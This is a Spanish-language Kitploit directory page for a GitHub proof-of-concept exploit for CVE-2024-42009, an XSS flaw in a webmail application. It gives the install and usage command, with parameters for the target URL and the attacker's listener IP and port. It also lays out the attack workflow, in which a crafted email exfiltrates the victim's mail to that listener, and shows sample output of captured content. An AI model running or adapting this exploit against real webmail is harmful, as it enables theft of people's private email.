Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-42009 — Esta Prueba de Concepto (PoC) demuestra un exploit para CVE-2024-42009, aprovechando una vulnerabilidad de cross-site scripting (XSS) para extraer correos electrónicos de una aplicación de webmail objetivo. El ataque inyecta un payload malicioso que exfiltra el contenido de los correos electrónicos hacia un listener controlado por el atacante. | Kitploit
Herramientas/GitHubGitHub/bhanunamikaze/cve-2024-42009
Herramientas de PhishingReconocimientoGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebExfiltración de DatosRecopilación de InformaciónAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Esta Prueba de Concepto (PoC) demuestra un exploit para CVE-2024-42009, aprovechando una vulnerabilidad de cross-site scripting (XSS) para extraer correos electrónicos de una aplicación de webmail objetivo. El ataque inyecta un payload malicioso que exfiltra el contenido de los correos electrónicos hacia un listener controlado por el atacante.

GitHub
bhanunamikaze/cve-2024-42009

CVE-2024-42009

Ver Repositorio
17hace 1 añoAún no revisado
Compartir

CVE-2024-42009 PoC: Listener de Captura de Correo Electrónico y Exploit XSS

Descripción general

Esta Prueba de Concepto (PoC) demuestra un exploit para CVE-2024-42009, aprovechando una vulnerabilidad de cross-site scripting (XSS) para extraer correos electrónicos de una aplicación de webmail objetivo. El ataque inyecta una carga maliciosa que extrae el contenido del correo a un listener controlado por el atacante.

Características

  • Explota una vulnerabilidad XSS para capturar el contenido de los correos electrónicos.
  • Utiliza un listener HTTP para recibir y decodificar correos extraídos.
  • Automatiza la inyección de la carga útil y la exfiltración.

Requisitos

  • Python 3.x
  • Dependencias requeridas (instalar mediante pip):
    root@kitploit:~
    pip install requests beautifulsoup4
    

Uso

Ejecute el script con los argumentos necesarios:

root@kitploit:~
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337

Parámetros

Flujo de trabajo del ataque

  1. Iniciar Listener: El script inicia un servidor HTTP para capturar correos extraídos.
  2. Inyectar Carga Maliciosa: La carga útil XSS se envía mediante un correo diseñado.
  3. Desencadenar Ejecución: Cuando la víctima abre el correo, la carga útil se ejecuta y envía el contenido del correo al servidor del atacante.
  4. Capturar y Decodificar: El contenido del correo extraído se decodifica y se muestra.

Ejemplo de salida

root@kitploit:~
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)

[+] Captured Email Content:
Hello, this is a test email!

Aviso legal

No reclamo crédito/propiedad/revelación de la vulnerabilidad ni de todos los exploits correspondientes alojados en este repositorio de GitHub - Todo el crédito es para el investigador que la descubrió; solo creé una PoC para replicar la vulnerabilidad basándome en datos de internet. Esta PoC es solo con fines educativos y de investigación. ¡Las pruebas no autorizadas contra sistemas sin consentimiento son ilegales. Úselo de manera responsable!

Descargar herramienta
ArgumentoDescripción
-fu, --from-userLa dirección de correo del remitente
-tu, --to-userLa dirección de correo del destinatario
-u, --target-urlLa URL de webmail objetivo
-ip, --server-ipLa dirección IP del listener del atacante
-p, --server-portEl puerto para el listener (por defecto: 1337)